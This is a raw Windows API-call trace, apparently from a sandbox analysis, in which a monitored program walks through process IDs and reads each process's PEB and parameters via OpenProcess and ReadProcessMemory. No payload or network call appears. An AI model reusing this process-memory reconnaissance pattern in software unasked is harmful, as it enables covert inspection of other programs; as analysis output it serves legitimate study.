[0404.097] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.097] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.097] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.097] malloc (_Size=0x5e) returned 0x2c0800
[0404.098] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d2734, lpBuffer=0x2c0800, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0404.098] free (_Block=0x2c0800)
[0404.098] CloseHandle (hObject=0x240) returned 1
[0404.109] _ui64tow (_Value=0x304, _Buffer="3068", _Radix=10) returned="772"
[0404.113] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="772") returned 3
[0404.117] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.117] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.138] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x240
[0404.139] GetLastError () returned 0x0
[0404.139] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x826de, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.141] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.142] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x81ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.142] malloc (_Size=0x58) returned 0x2b99b0
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x8272e, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0404.143] free (_Block=0x2b99b0)
[0404.143] CloseHandle (hObject=0x240) returned 1
[0404.144] _ui64tow (_Value=0x310, _Buffer="772", _Radix=10) returned="784"
[0404.149] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="784") returned 3
[0404.150] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.150] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x310) returned 0x240
[0404.173] GetLastError () returned 0x0
[0404.173] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.173] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.173] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.174] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.174] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226f6, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.175] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.176] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.176] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] malloc (_Size=0x82) returned 0x2c4740
[0404.177] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622770, lpBuffer=0x2c4740, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] free (_Block=0x2c4740)
[0404.178] CloseHandle (hObject=0x240) returned 1
[0404.179] _ui64tow (_Value=0x754, _Buffer="784", _Radix=10) returned="1876"
[0404.184] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1876") returned 4
[0404.185] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.185] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x240
[0404.213] GetLastError () returned 0x0
[0404.213] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6128f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6126d8, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.215] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.217] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x611ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] malloc (_Size=0x68) returned 0x2c08e0
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x612738, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] free (_Block=0x2c08e0)
[0404.218] CloseHandle (hObject=0x240) returned 1
[0404.219] _ui64tow (_Value=0x444, _Buffer="1876", _Radix=10) returned="1092"
[0404.224] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1092") returned 4
[0404.229] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.229] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x240
[0404.252] GetLastError () returned 0x0
[0404.252] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.252] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d2880, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d26ce, lpBuffer=0x12dd100, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.254] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.260] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.260] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] malloc (_Size=0x44) returned 0x2bd180
[0404.261] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d270a, lpBuffer=0x2bd180, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd180*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] free (_Block=0x2bd180)
[0404.262] CloseHandle (hObject=0x240) returned 1
[0404.263] _ui64tow (_Value=0x828, _Buffer="1092", _Radix=10) returned="2088"
[0404.267] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2088") returned 4
[0404.269] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.269] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x828) returned 0x240
[0404.300] GetLastError () returned 0x0
[0404.300] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2628e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626e0, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.303] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.304] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x261ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] malloc (_Size=0x60) returned 0x2c0790
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x262738, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] free (_Block=0x2c0790)
[0404.306] CloseHandle (hObject=0x240) returned 1
[0404.307] _ui64tow (_Value=0x6e4, _Buffer="2088", _Radix=10) returned="1764"
[0404.312] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1764") returned 4
[0404.313] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.313] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x240
[0404.340] GetLastError () returned 0x0
[0404.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3828f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3826e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.342] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.343] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x381ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.344] malloc (_Size=0x62) returned 0x2c0790
[0404.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x38273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.344] free (_Block=0x2c0790)
[0404.345] CloseHandle (hObject=0x240) returned 1
[0404.372] _ui64tow (_Value=0x71c, _Buffer="1764", _Radix=10) returned="1820"
[0404.377] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1820") returned 4
[0404.378] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x236, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.378] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x240
[0404.401] GetLastError () returned 0x0
[0404.402] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4826f2, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.403] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.405] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] malloc (_Size=0x72) returned 0x2c4740
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x48275c, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] free (_Block=0x2c4740)
[0404.406] CloseHandle (hObject=0x240) returned 1
[0404.407] _ui64tow (_Value=0x738, _Buffer="1820", _Radix=10) returned="1848"
[0404.415] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1848") returned 4
[0404.416] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.416] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.440] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x240
[0404.440] GetLastError () returned 0x0
[0404.440] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.440] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.440] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.441] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.441] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5126ee, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.449] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.451] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
